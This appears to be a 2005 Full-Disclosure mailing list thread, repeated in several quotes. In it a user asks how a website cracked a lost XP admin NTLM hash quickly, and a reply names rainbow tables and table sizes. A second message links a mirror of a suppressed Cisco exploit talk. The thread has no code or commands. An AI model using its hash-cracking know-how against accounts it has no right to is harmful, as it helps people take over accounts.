full-disclosure@lists.grok.org.uk:

Xurron> hiya!
Xurron> I have tried many softwares for cracking NTLM hashes, like NC4,
Cain and have't tried Rainbow Crack yet.
Xurron> Once i had to recover my XPs lost admin password and i spend
around 1 day but Cain/NC4 were not able to guess that. Then i posted
that hashes on some site and it did recover my passwd in around 5min. I
want to know which technique they used to crack so fast ?

Xurron> Xurron


-- 
~/ZARAZA
http://www.security.nnov.ru/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

[[EMAIL PROTECTED]]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

prolly rainbow crack, often in less than 2min, it depends then of 
your tables size, around 25GB of tables to crack for example an 
alpanumericsymbol15 (with space) ntlm passwd.


At 10:15 30/07/05, X u r r o n wrote:

hiya!
I have tried many softwares for cracking NTLM hashes, like NC4, Cain 
and have't tried Rainbow Crack yet.
Once i had to recover my XPs lost admin password and i spend around 
1 day but Cain/NC4 were not able to guess that. Then i posted that 
hashes on some site and it did recover my passwd in around 5min. I 
want to know which technique they used to crack so fast ?


Xurron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2rc2 (MingW32)

iQIVAwUBQus3Bq+LRXunxpxfAQITXw//XgCQkizJimpyJKEJPRMXsgSnS80xBOHs
kXwJ4DTSsdtNDqhrSvOmcI7Z52gOwCiXOsHCROf7Qmywf2JFoACWycIfJkOTib07
LqhQhqeStrtFdVsDlpjZq0WA8D6DQySIF/HPtE5JGmoEQlRmLwqzoHlEAo3Dqjt6
DQAEzgd4ZasfPI4bone60f+sYKhT5/dgabTucmEM120pUxlxqV6QpWWCihOCJLwf
8Pe037K8x8ST0NQT2CBTxb2EQNASyt8PmvalNeQbsPdthRSNjtbGbsw7hCfNV9b1
iGywDamZJ7e6S9YuJXvc41p7EdNNx15/CinfaeHCKJzY7/cXoE2Md7GlGHwq7XbG
WzPyVaxkdiU95g0x5gXMNhduWLDGu073ouPYC1r7sZ8REZhWtAaVolC6VFh3NzdS
2LSJLcoHU57jvEL25kYfuo7iP5lNx8yp/9DLV32xKGYHK6FBxdK1zEqb9CnfVh+2
4B511QKYMY755UQ1wvYQy6T4tksUdoUmUA471kBorpl1uvYW5YqQgkzsZ6n33nTH
3j1B3TgMkWaQuRhel/+Wp5xpbOG//6Bjd2s+b6B5K8R1mHrqEpcVIYnxxnHSICa7
Lga1oXu4GqgI2PLNaSBEz3X8dIOXQKFIfUCx5C/ZJGMAhvqIgfGyXytSEfzYx/a6
vBS7/sCgeL8=
=4lzc
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Best way to crack NT passwds

[X u r r o n]

hiya!
I have tried many softwares for cracking NTLM hashes, like NC4, Cain and have't tried Rainbow Crack yet.
Once i had to recover my XPs lost admin password and i spend around 1 day but Cain/NC4 were not able to guess that. Then i posted that hashes on some site and it did recover my passwd in around 5min. I want to know which technique they used to crack so fast ?
Xurron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Lynn Preso.

[Valdis . Kletnieks]

On Fri, 29 Jul 2005 23:54:31 PDT, [EMAIL PROTECTED] said:

> using microsoft search technologies a mirror was located
> http://www.securitylab.ru/_Exploits/2005/07/lynn-cisco.pdf

Somehow, I don't think a cease-and-desist court order from a US
court is going to bother these guys much. ;)


pgpjas8yO642g.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/